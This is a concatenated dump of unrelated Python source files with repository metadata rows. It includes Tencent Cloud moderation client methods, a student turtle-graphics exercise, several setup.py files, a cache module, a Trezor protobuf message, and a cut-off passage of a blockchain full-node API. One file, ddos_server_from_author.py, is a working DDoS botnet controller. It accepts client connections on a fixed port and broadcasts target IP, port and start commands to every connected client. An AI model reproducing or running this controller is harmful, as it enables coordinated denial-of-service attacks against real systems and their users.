reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def ImageModeration(self, request):
"""图片内容检测服务(Image Moderation, IM)能自动扫描图片,识别涉黄、涉恐、涉政、涉毒等有害内容,同时支持用户配置图片黑名单,打击自定义的违规图片。
:param request: 调用ImageModeration所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.ImageModerationRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.ImageModerationResponse`
"""
try:
params = request._serialize()
body = self.call("ImageModeration", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.ImageModerationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def TextModeration(self, request):
"""文本内容检测(Text Moderation)服务使用了深度学习技术,识别涉黄、涉政、涉恐等有害内容,同时支持用户配置词库,打击自定义的违规文本。
:param request: 调用TextModeration所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.TextModerationRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.TextModerationResponse`
"""
try:
params = request._serialize()
body = self.call("TextModeration", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.TextModerationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def VideoModeration(self, request):
"""视频内容检测(Video Moderation, VM)服务能识别涉黄、涉政、涉恐等违规视频,同时支持用户配置视频黑库,打击自定义的违规内容。
:param request: 调用VideoModeration所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.VideoModerationRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.VideoModerationResponse`
"""
try:
params = request._serialize()
body = self.call("VideoModeration", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.VideoModerationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
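# Illustrative usage sketch (not part of the SDK): calling TextModeration
# through this client. Credential and client construction follow the usual
# Tencent Cloud SDK pattern; the request's "Content" attribute (base64-encoded
# text) is an assumption here, so check the CMS API reference before use.
def _demo_text_moderation(secret_id, secret_key, text):
    import base64
    from tencentcloud.common import credential
    cred = credential.Credential(secret_id, secret_key)
    client = CmsClient(cred, "ap-guangzhou")
    req = models.TextModerationRequest()
    req.Content = base64.b64encode(text.encode("utf-8")).decode()  # assumed field name
    return client.TextModeration(req)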
| 41.309237
| 99
| 0.6084
|
077982c89dc7723d7ff60702256c5108fb2c5623
| 2,019
|
py
|
Python
|
src/m7_summary.py
|
goinjl/01-IntroductionToPython
|
f24e65ac658f580f59d30f1cfec1078dc2ad74df
|
[
"MIT"
] | null | null | null |
src/m7_summary.py
|
goinjl/01-IntroductionToPython
|
f24e65ac658f580f59d30f1cfec1078dc2ad74df
|
[
"MIT"
] | null | null | null |
src/m7_summary.py
|
goinjl/01-IntroductionToPython
|
f24e65ac658f580f59d30f1cfec1078dc2ad74df
|
[
"MIT"
] | null | null | null |
"""
An exercise that summarizes what you have learned in this Session.
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Aaron Wilkin, their colleagues, and Jacey.
"""
########################################################################
# DONE: 1.
# On Line 5 above, replace PUT_YOUR_NAME_HERE with your own name.
########################################################################
import rosegraphics as rg
########################################################################
#
# DONE: 2.
# Write code that accomplishes the following (and ONLY the following),
# in the order listed:
#
# - Constructs a SimpleTurtle with a 'blue' Pen.
#
# - Makes the SimpleTurtle go straight UP 200 pixels.
#
# - Makes the SimpleTurtle lift its pen UP
# (so that the next movements do NOT leave a "trail")
# HINT: Use the "dot trick" to figure out how to do this.
#
# - Makes the SimpleTurtle go to the Point at (100, -40).
#
# - Makes the SimpleTurtle put its pen DOWN
# (so that the next movements will return to leaving a "trail").
#
# - Makes the SimpleTurtle's pen have color 'green' and thickness 10.
#
# - Makes the SimpleTurtle go 150 pixels straight DOWN.
#
# Don't forget to:
# - import rosegraphics and construct a TurtleWindow
# at the BEGINNING of your code, and to
# - ask your TurtleWindow to close_on_mouse_click
# as the LAST line of your code.
# See the beginning and end of m4e_loopy_turtles for an example.
#
# As always, test by running the module.
# As always, COMMIT-and-PUSH when you are done with this module.
#
########################################################################
window = rg.TurtleWindow()
jacey = rg.SimpleTurtle('turtle')
jacey.pen = rg.Pen('blue', 1)
jacey.left(90)
jacey.forward(200)
jacey.pen_up()
jacey.go_to(rg.Point(100, -40))
jacey.pen_down()
jacey.pen = rg.Pen('green', 10)
jacey.backward(150)
window.close_on_mouse_click()
| 35.421053
| 72
| 0.590887
|
56a8f6b651f4fa959f24619332fd41b428ed605c
| 2,472
|
py
|
Python
|
setup.py
|
rhunwicks/tablib
|
bbdf5f11ab0c77e0b8907c593cdd73e287c2948d
|
[
"MIT"
] | null | null | null |
setup.py
|
rhunwicks/tablib
|
bbdf5f11ab0c77e0b8907c593cdd73e287c2948d
|
[
"MIT"
] | null | null | null |
setup.py
|
rhunwicks/tablib
|
bbdf5f11ab0c77e0b8907c593cdd73e287c2948d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import tablib
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
sys.exit()
if sys.argv[-1] == 'speedups':
try:
__import__('pip')
except ImportError:
print('Pip required.')
sys.exit(1)
os.system('pip install ujson pyyaml')
sys.exit()
if sys.argv[-1] == 'test':
try:
__import__('py')
except ImportError:
print('py.test required.')
sys.exit(1)
errors = os.system('py.test test_tablib.py')
sys.exit(bool(errors))
packages = [
'tablib', 'tablib.formats',
'tablib.packages',
'tablib.packages.omnijson',
'tablib.packages.unicodecsv',
'tablib.packages.xlwt',
'tablib.packages.xlrd',
'tablib.packages.odf',
'tablib.packages.openpyxl',
'tablib.packages.openpyxl.shared',
'tablib.packages.openpyxl.reader',
'tablib.packages.openpyxl.writer',
'tablib.packages.yaml',
'tablib.packages.dbfpy',
'tablib.packages.xlwt3',
'tablib.packages.xlrd3',
'tablib.packages.odf3',
'tablib.packages.openpyxl3',
'tablib.packages.openpyxl3.shared',
'tablib.packages.openpyxl3.reader',
'tablib.packages.openpyxl3.writer',
'tablib.packages.yaml3',
'tablib.packages.dbfpy3'
]
setup(
name='tablib',
version=tablib.__version__,
description='Format agnostic tabular data library (XLS, JSON, YAML, CSV)',
long_description=(open('README.rst').read() + '\n\n' +
open('HISTORY.rst').read()),
author='Kenneth Reitz',
author_email='me@kennethreitz.org',
url='http://python-tablib.org',
packages=packages,
license='MIT',
classifiers=(
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
),
tests_require=['pytest'],
)
| 26.580645
| 78
| 0.618932
|
e8e523c795b546f3fef0bab80a23f3470ef5cf32
| 3,311
|
py
|
Python
|
c7n/cache.py
|
dnouri/cloud-custodian
|
4e8b3b45f60731df942ffe6b61645416d7a67daa
|
[
"Apache-2.0"
] | 1
|
2020-09-07T21:10:29.000Z
|
2020-09-07T21:10:29.000Z
|
c7n/cache.py
|
dnouri/cloud-custodian
|
4e8b3b45f60731df942ffe6b61645416d7a67daa
|
[
"Apache-2.0"
] | 1
|
2021-02-10T02:20:45.000Z
|
2021-02-10T02:20:45.000Z
|
c7n/cache.py
|
dnouri/cloud-custodian
|
4e8b3b45f60731df942ffe6b61645416d7a67daa
|
[
"Apache-2.0"
] | 1
|
2021-05-02T01:49:36.000Z
|
2021-05-02T01:49:36.000Z
|
# Copyright 2015-2017 Capital One Services, LLC
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
"""Provide basic caching services to avoid extraneous queries over
multiple policies on the same resource type.
"""
import pickle
import os
import logging
import time
log = logging.getLogger('custodian.cache')
CACHE_NOTIFY = False
def factory(config):
global CACHE_NOTIFY
if not config:
return NullCache(None)
if not config.cache or not config.cache_period:
if not CACHE_NOTIFY:
log.debug("Disabling cache")
CACHE_NOTIFY = True
return NullCache(config)
elif config.cache == 'memory':
if not CACHE_NOTIFY:
log.debug("Using in-memory cache")
CACHE_NOTIFY = True
return InMemoryCache()
return FileCacheManager(config)
class NullCache:
def __init__(self, config):
self.config = config
def load(self):
return False
def get(self, key):
pass
def save(self, key, data):
pass
def size(self):
return 0
class InMemoryCache:
# Running in a temporary environment, so keep as a cache.
__shared_state = {}
def __init__(self):
self.data = self.__shared_state
def load(self):
return True
def get(self, key):
return self.data.get(pickle.dumps(key))
def save(self, key, data):
self.data[pickle.dumps(key)] = data
def size(self):
return sum(map(len, self.data.values()))
class FileCacheManager:
def __init__(self, config):
self.config = config
self.cache_period = config.cache_period
self.cache_path = os.path.abspath(
os.path.expanduser(
os.path.expandvars(
config.cache)))
self.data = {}
def get(self, key):
k = pickle.dumps(key)
return self.data.get(k)
def load(self):
if self.data:
return True
if os.path.isfile(self.cache_path):
if (time.time() - os.stat(self.cache_path).st_mtime >
self.config.cache_period * 60):
return False
with open(self.cache_path, 'rb') as fh:
try:
self.data = pickle.load(fh)
except EOFError:
return False
log.debug("Using cache file %s" % self.cache_path)
return True
def save(self, key, data):
try:
with open(self.cache_path, 'wb') as fh:
self.data[pickle.dumps(key)] = data
pickle.dump(self.data, fh, protocol=2)
except Exception as e:
log.warning("Could not save cache %s err: %s" % (
self.cache_path, e))
if not os.path.exists(self.cache_path):
directory = os.path.dirname(self.cache_path)
log.info('Generating Cache directory: %s.' % directory)
try:
os.makedirs(directory)
except Exception as e:
log.warning("Could not create directory: %s err: %s" % (
directory, e))
def size(self):
return os.path.exists(self.cache_path) and os.path.getsize(self.cache_path) or 0
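# Illustrative sketch (not part of the upstream module): how factory() picks a
# cache backend from the config it is given. _Config is a stand-in exposing only
# the attributes factory() actually reads.
def _demo_factory():
    class _Config:
        def __init__(self, cache, cache_period):
            self.cache = cache
            self.cache_period = cache_period
    assert isinstance(factory(None), NullCache)                       # no config at all
    assert isinstance(factory(_Config(None, 0)), NullCache)           # caching disabled
    assert isinstance(factory(_Config('memory', 15)), InMemoryCache)  # shared in-memory cache
    assert isinstance(factory(_Config('/tmp/c7n.cache', 15)), FileCacheManager)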
| 26.070866
| 88
| 0.573543
|
ffa4a5ca8444e6d01612d92df1ffdf39d1dce910
| 505
|
py
|
Python
|
setup.py
|
vnep-approx-latency/alib
|
d3dd943011acd55e890f67b7539bad54060210bc
|
[
"MIT"
] | 2
|
2020-06-24T17:20:46.000Z
|
2022-03-23T09:58:51.000Z
|
setup.py
|
vnep-approx-latency/alib
|
d3dd943011acd55e890f67b7539bad54060210bc
|
[
"MIT"
] | null | null | null |
setup.py
|
vnep-approx-latency/alib
|
d3dd943011acd55e890f67b7539bad54060210bc
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
install_requires = [
# "gurobipy", # install this manually
"matplotlib",
"numpy",
"click",
"pyyaml",
"jsonpickle",
"unidecode",
"networkx",
"pytest"
]
setup(
name="alib",
python_requires=">=3.7",
packages=["alib"],
package_data={"alib": ["data/topologyZoo/*.yml"]},
install_requires=install_requires,
entry_points={
"console_scripts": [
"alib = alib.cli:cli",
]
}
)
| 18.703704
| 54
| 0.572277
|
c6aff590223d0caceb086c7059e4d5cf211d4324
| 3,563
|
py
|
Python
|
hwilib/devices/trezorlib/messages/Features.py
|
tomatoskittles/HWI
|
ccb55228a80725ff85b96d55874acc688320b30b
|
[
"MIT"
] | 9
|
2019-04-23T01:10:28.000Z
|
2022-02-21T02:25:06.000Z
|
hwilib/devices/trezorlib/messages/Features.py
|
tomatoskittles/HWI
|
ccb55228a80725ff85b96d55874acc688320b30b
|
[
"MIT"
] | null | null | null |
hwilib/devices/trezorlib/messages/Features.py
|
tomatoskittles/HWI
|
ccb55228a80725ff85b96d55874acc688320b30b
|
[
"MIT"
] | 1
|
2020-07-17T18:49:34.000Z
|
2020-07-17T18:49:34.000Z
|
# Automatically generated by pb2py
# fmt: off
from .. import protobuf as p
class Features(p.MessageType):
MESSAGE_WIRE_TYPE = 17
def __init__(
self,
vendor: str = None,
major_version: int = None,
minor_version: int = None,
patch_version: int = None,
bootloader_mode: bool = None,
device_id: str = None,
pin_protection: bool = None,
passphrase_protection: bool = None,
language: str = None,
label: str = None,
initialized: bool = None,
revision: bytes = None,
bootloader_hash: bytes = None,
imported: bool = None,
pin_cached: bool = None,
passphrase_cached: bool = None,
firmware_present: bool = None,
needs_backup: bool = None,
flags: int = None,
model: str = None,
fw_major: int = None,
fw_minor: int = None,
fw_patch: int = None,
fw_vendor: str = None,
fw_vendor_keys: bytes = None,
unfinished_backup: bool = None,
no_backup: bool = None,
) -> None:
self.vendor = vendor
self.major_version = major_version
self.minor_version = minor_version
self.patch_version = patch_version
self.bootloader_mode = bootloader_mode
self.device_id = device_id
self.pin_protection = pin_protection
self.passphrase_protection = passphrase_protection
self.language = language
self.label = label
self.initialized = initialized
self.revision = revision
self.bootloader_hash = bootloader_hash
self.imported = imported
self.pin_cached = pin_cached
self.passphrase_cached = passphrase_cached
self.firmware_present = firmware_present
self.needs_backup = needs_backup
self.flags = flags
self.model = model
self.fw_major = fw_major
self.fw_minor = fw_minor
self.fw_patch = fw_patch
self.fw_vendor = fw_vendor
self.fw_vendor_keys = fw_vendor_keys
self.unfinished_backup = unfinished_backup
self.no_backup = no_backup
@classmethod
def get_fields(cls):
return {
1: ('vendor', p.UnicodeType, 0),
2: ('major_version', p.UVarintType, 0),
3: ('minor_version', p.UVarintType, 0),
4: ('patch_version', p.UVarintType, 0),
5: ('bootloader_mode', p.BoolType, 0),
6: ('device_id', p.UnicodeType, 0),
7: ('pin_protection', p.BoolType, 0),
8: ('passphrase_protection', p.BoolType, 0),
9: ('language', p.UnicodeType, 0),
10: ('label', p.UnicodeType, 0),
12: ('initialized', p.BoolType, 0),
13: ('revision', p.BytesType, 0),
14: ('bootloader_hash', p.BytesType, 0),
15: ('imported', p.BoolType, 0),
16: ('pin_cached', p.BoolType, 0),
17: ('passphrase_cached', p.BoolType, 0),
# 18: ('firmware_present', p.BoolType, 0),
# 19: ('needs_backup', p.BoolType, 0),
# 20: ('flags', p.UVarintType, 0),
21: ('model', p.UnicodeType, 0),
# 22: ('fw_major', p.UVarintType, 0),
# 23: ('fw_minor', p.UVarintType, 0),
# 24: ('fw_patch', p.UVarintType, 0),
# 25: ('fw_vendor', p.UnicodeType, 0),
# 26: ('fw_vendor_keys', p.BytesType, 0),
# 27: ('unfinished_backup', p.BoolType, 0),
# 28: ('no_backup', p.BoolType, 0),
}
| 36.357143
| 58
| 0.564412
|
49d69a802a7722a38850c2a7566ea0d99b926e92
| 1,093
|
py
|
Python
|
refer/ddos_server_from_author.py
|
satan1a/DDoS_Attacket_v0.1
|
dd86c48d9f7fe274127760aed5c8dcfd5bc014cb
|
[
"MIT"
] | 15
|
2019-10-27T17:44:58.000Z
|
2022-02-24T01:58:34.000Z
|
refer/ddos_server_from_author.py
|
satan1a/DDoS_Attacket_v0.1
|
dd86c48d9f7fe274127760aed5c8dcfd5bc014cb
|
[
"MIT"
] | null | null | null |
refer/ddos_server_from_author.py
|
satan1a/DDoS_Attacket_v0.1
|
dd86c48d9f7fe274127760aed5c8dcfd5bc014cb
|
[
"MIT"
] | 5
|
2019-10-28T02:14:35.000Z
|
2021-10-20T07:27:48.000Z
|
import socket
import argparse
from threading import Thread
socketList = []
# Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>'
# Send command
def sendCmd(cmd):
print("Send command......")
for sock in socketList:
sock.send(cmd.encode('UTF-8'))
# Wait for client connections
def waitConnect(s):
while True:
sock, addr = s.accept()
if sock not in socketList:
socketList.append(sock)
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 58868))
s.listen(1024)
t = Thread(target = waitConnect, args = (s, ))
t.start()
    print('Waiting for at least one client connection!')
while not len(socketList):
pass
    print('A client has connected!')
while True:
print('=' * 50)
print('The command format:"#-H xxx.xxx.xxx.xxx -p xxx -c <start>"')
# Wait for input command
cmd_str = input("Please input cmd:")
if len(cmd_str):
if cmd_str[0] == '#':
sendCmd(cmd_str)
if __name__ == '__main__':
main()
| 25.418605
| 75
| 0.58097
|
51b373b471e629e576daf90267c5bd4de8babe31
| 33
|
py
|
Python
|
test/__init__.py
|
ryanfeather/parsimony
|
0d3bbe247b47234a0c15962e538b2f04609c4a33
|
[
"MIT"
] | 1
|
2018-07-02T11:08:29.000Z
|
2018-07-02T11:08:29.000Z
|
test/__init__.py
|
ryanfeather/parsimony
|
0d3bbe247b47234a0c15962e538b2f04609c4a33
|
[
"MIT"
] | 5
|
2015-03-19T13:29:29.000Z
|
2015-04-04T19:47:01.000Z
|
test/__init__.py
|
ryanfeather/parsimony
|
0d3bbe247b47234a0c15962e538b2f04609c4a33
|
[
"MIT"
] | null | null | null |
from . import TestEvaluationUtils
| 33
| 33
| 0.878788
|
4e2ad936ebf4ab9adb537f3d0f7eccb6f7de5e58
| 3,334
|
py
|
Python
|
setup.py
|
spitGlued/requests
|
6cfbe1aedd56f8c2f9ff8b968efe65b22669795b
|
[
"Apache-2.0"
] | 14
|
2020-02-12T07:03:12.000Z
|
2022-01-08T22:15:59.000Z
|
setup.py
|
spitGlued/requests
|
6cfbe1aedd56f8c2f9ff8b968efe65b22669795b
|
[
"Apache-2.0"
] | 2
|
2020-02-24T17:01:20.000Z
|
2020-10-11T10:37:33.000Z
|
setup.py
|
spitGlued/requests
|
6cfbe1aedd56f8c2f9ff8b968efe65b22669795b
|
[
"Apache-2.0"
] | 1
|
2021-01-30T18:17:01.000Z
|
2021-01-30T18:17:01.000Z
|
#!/usr/bin/env python
# Learn more: https://github.com/kennethreitz/setup.py
import os
import re
import sys
from codecs import open
from setuptools import setup
from setuptools.command.test import test as TestCommand
here = os.path.abspath(os.path.dirname(__file__))
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass into py.test")]
def initialize_options(self):
TestCommand.initialize_options(self)
try:
from multiprocessing import cpu_count
self.pytest_args = ['-n', str(cpu_count()), '--boxed']
except (ImportError, NotImplementedError):
self.pytest_args = ['-n', '1', '--boxed']
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
# 'setup.py publish' shortcut.
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist bdist_wheel')
os.system('twine upload dist/*')
sys.exit()
packages = ['requests']
requires = [
'chardet>=3.0.2,<3.1.0',
'idna>=2.5,<2.8',
'urllib3>=1.21.1,<1.25',
'certifi>=2017.4.17'
]
test_requirements = [
'pytest-httpbin==0.0.7',
'pytest-cov',
'pytest-mock',
'pytest-xdist',
'PySocks>=1.5.6, !=1.5.7',
'pytest>=2.8.0'
]
about = {}
with open(os.path.join(here, 'requests', '__version__.py'), 'r', 'utf-8') as f:
exec(f.read(), about)
with open('README.md', 'r', 'utf-8') as f:
readme = f.read()
with open('HISTORY.md', 'r', 'utf-8') as f:
history = f.read()
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
long_description=readme,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
packages=packages,
package_data={'': ['LICENSE', 'NOTICE'], 'requests': ['*.pem']},
package_dir={'requests': 'requests'},
include_package_data=True,
python_requires=">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*",
install_requires=requires,
license=about['__license__'],
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
cmdclass={'test': PyTest},
tests_require=test_requirements,
extras_require={
'security': ['pyOpenSSL >= 0.14', 'cryptography>=1.3.4', 'idna>=2.0.0'],
'socks': ['PySocks>=1.5.6, !=1.5.7'],
'socks:sys_platform == "win32" and python_version == "2.7"': ['win_inet_pton'],
},
)
| 30.309091
| 87
| 0.610678
|
99bcde443d48ada68a6f3fabc6903b8ddd61591b
| 61,632
|
py
|
Python
|
flax/full_node/full_node_api.py
|
amuDev/flax-blockchain
|
b19e99bf78b5d23e071c9a9c499f7698bc6ad7b8
|
[
"Apache-2.0"
] | 1
|
2021-06-24T07:24:21.000Z
|
2021-06-24T07:24:21.000Z
|
flax/full_node/full_node_api.py
|
wolfrage76/flax-blockchain
|
97d396ca35ce3ab585e357f8dd5e9a5a57c504fb
|
[
"Apache-2.0"
] | null | null | null |
flax/full_node/full_node_api.py
|
wolfrage76/flax-blockchain
|
97d396ca35ce3ab585e357f8dd5e9a5a57c504fb
|
[
"Apache-2.0"
] | 1
|
2021-06-21T00:20:33.000Z
|
2021-06-21T00:20:33.000Z
|
import asyncio
import dataclasses
import time
from secrets import token_bytes
from typing import Callable, Dict, List, Optional, Tuple, Set
from blspy import AugSchemeMPL, G2Element
from chiabip158 import PyBIP158
import flax.server.ws_connection as ws
from flax.consensus.block_creation import create_unfinished_block
from flax.consensus.block_record import BlockRecord
from flax.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from flax.full_node.bundle_tools import best_solution_generator_from_template, simple_solution_generator
from flax.full_node.full_node import FullNode
from flax.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from flax.full_node.signage_point import SignagePoint
from flax.protocols import farmer_protocol, full_node_protocol, introducer_protocol, timelord_protocol, wallet_protocol
from flax.protocols.full_node_protocol import RejectBlock, RejectBlocks
from flax.protocols.protocol_message_types import ProtocolMessageTypes
from flax.protocols.wallet_protocol import PuzzleSolutionResponse, RejectHeaderBlocks, RejectHeaderRequest
from flax.server.outbound_message import Message, make_msg
from flax.types.blockchain_format.coin import Coin, hash_coin_list
from flax.types.blockchain_format.pool_target import PoolTarget
from flax.types.blockchain_format.program import Program
from flax.types.blockchain_format.sized_bytes import bytes32
from flax.types.coin_record import CoinRecord
from flax.types.end_of_slot_bundle import EndOfSubSlotBundle
from flax.types.full_block import FullBlock
from flax.types.generator_types import BlockGenerator
from flax.types.mempool_inclusion_status import MempoolInclusionStatus
from flax.types.mempool_item import MempoolItem
from flax.types.peer_info import PeerInfo
from flax.types.unfinished_block import UnfinishedBlock
from flax.util.api_decorators import api_request, peer_required, bytes_required, execute_task
from flax.util.generator_tools import get_block_header
from flax.util.hash import std_hash
from flax.util.ints import uint8, uint32, uint64, uint128
from flax.util.merkle_set import MerkleSet
class FullNodeAPI:
full_node: FullNode
def __init__(self, full_node) -> None:
self.full_node = full_node
def _set_state_changed_callback(self, callback: Callable):
self.full_node.state_changed_callback = callback
@property
def server(self):
return self.full_node.server
@property
def log(self):
return self.full_node.log
@property
def api_ready(self):
return self.full_node.initialized
@peer_required
@api_request
async def request_peers(self, _request: full_node_protocol.RequestPeers, peer: ws.WSFlaxConnection):
if peer.peer_server_port is None:
return None
peer_info = PeerInfo(peer.peer_host, peer.peer_server_port)
if self.full_node.full_node_peers is not None:
msg = await self.full_node.full_node_peers.request_peers(peer_info)
return msg
@peer_required
@api_request
async def respond_peers(
self, request: full_node_protocol.RespondPeers, peer: ws.WSFlaxConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), True)
return None
@peer_required
@api_request
async def respond_peers_introducer(
self, request: introducer_protocol.RespondPeersIntroducer, peer: ws.WSFlaxConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers from introducer")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), False)
await peer.close()
return None
@execute_task
@peer_required
@api_request
async def new_peak(self, request: full_node_protocol.NewPeak, peer: ws.WSFlaxConnection) -> Optional[Message]:
"""
A peer notifies us that they have added a new peak to their blockchain. If we don't have it,
we can ask for it.
"""
async with self.full_node.new_peak_lock:
return await self.full_node.new_peak(request, peer)
@peer_required
@api_request
async def new_transaction(
self, transaction: full_node_protocol.NewTransaction, peer: ws.WSFlaxConnection
) -> Optional[Message]:
"""
A peer notifies us of a new transaction.
Requests a full transaction if we haven't seen it previously, and if the fees are enough.
"""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if not (await self.full_node.synced()):
return None
if int(time.time()) <= self.full_node.constants.INITIAL_FREEZE_END_TIMESTAMP:
return None
# Ignore if already seen
if self.full_node.mempool_manager.seen(transaction.transaction_id):
return None
if self.full_node.mempool_manager.is_fee_enough(transaction.fees, transaction.cost):
            # If there's already a pending request, just add this peer to the set of peers that have this tx
if transaction.transaction_id in self.full_node.full_node_store.pending_tx_request:
if transaction.transaction_id in self.full_node.full_node_store.peers_with_tx:
current_set = self.full_node.full_node_store.peers_with_tx[transaction.transaction_id]
if peer.peer_node_id in current_set:
return None
current_set.add(peer.peer_node_id)
return None
else:
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
return None
self.full_node.full_node_store.pending_tx_request[transaction.transaction_id] = peer.peer_node_id
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
async def tx_request_and_timeout(full_node: FullNode, transaction_id, task_id):
counter = 0
try:
while True:
# Limit to asking 10 peers, it's possible that this tx got included on chain already
# Highly unlikely 10 peers that advertised a tx don't respond to a request
if counter == 10:
break
if transaction_id not in full_node.full_node_store.peers_with_tx:
break
peers_with_tx: Set = full_node.full_node_store.peers_with_tx[transaction_id]
if len(peers_with_tx) == 0:
break
peer_id = peers_with_tx.pop()
assert full_node.server is not None
if peer_id not in full_node.server.all_connections:
continue
peer = full_node.server.all_connections[peer_id]
request_tx = full_node_protocol.RequestTransaction(transaction.transaction_id)
msg = make_msg(ProtocolMessageTypes.request_transaction, request_tx)
await peer.send_message(msg)
await asyncio.sleep(5)
counter += 1
if full_node.mempool_manager.seen(transaction_id):
break
except asyncio.CancelledError:
pass
finally:
# Always clean up, even if the task was cancelled
if transaction_id in full_node.full_node_store.peers_with_tx:
full_node.full_node_store.peers_with_tx.pop(transaction_id)
if transaction_id in full_node.full_node_store.pending_tx_request:
full_node.full_node_store.pending_tx_request.pop(transaction_id)
if task_id in full_node.full_node_store.tx_fetch_tasks:
full_node.full_node_store.tx_fetch_tasks.pop(task_id)
task_id = token_bytes()
fetch_task = asyncio.create_task(
tx_request_and_timeout(self.full_node, transaction.transaction_id, task_id)
)
self.full_node.full_node_store.tx_fetch_tasks[task_id] = fetch_task
return None
return None
@api_request
async def request_transaction(self, request: full_node_protocol.RequestTransaction) -> Optional[Message]:
"""Peer has requested a full transaction from us."""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
spend_bundle = self.full_node.mempool_manager.get_spendbundle(request.transaction_id)
if spend_bundle is None:
return None
transaction = full_node_protocol.RespondTransaction(spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
return msg
@peer_required
@api_request
@bytes_required
async def respond_transaction(
self,
tx: full_node_protocol.RespondTransaction,
peer: ws.WSFlaxConnection,
tx_bytes: bytes = b"",
test: bool = False,
) -> Optional[Message]:
"""
Receives a full transaction from peer.
If tx is added to mempool, send tx_id to others. (new_transaction)
"""
assert tx_bytes != b""
spend_name = std_hash(tx_bytes)
if spend_name in self.full_node.full_node_store.pending_tx_request:
self.full_node.full_node_store.pending_tx_request.pop(spend_name)
if spend_name in self.full_node.full_node_store.peers_with_tx:
self.full_node.full_node_store.peers_with_tx.pop(spend_name)
await self.full_node.respond_transaction(tx.transaction, spend_name, peer, test)
return None
@api_request
async def request_proof_of_weight(self, request: full_node_protocol.RequestProofOfWeight) -> Optional[Message]:
if self.full_node.weight_proof_handler is None:
return None
if not self.full_node.blockchain.contains_block(request.tip):
self.log.error(f"got weight proof request for unknown peak {request.tip}")
return None
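# pow_creation de-duplicates concurrent weight-proof requests: if a proof for
# this tip is already being generated, wait for that attempt to finish before
# requesting the proof again.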
if request.tip in self.full_node.pow_creation:
event = self.full_node.pow_creation[request.tip]
await event.wait()
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
else:
event = asyncio.Event()
self.full_node.pow_creation[request.tip] = event
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
event.set()
tips = list(self.full_node.pow_creation.keys())
if len(tips) > 4:
# Remove old from cache
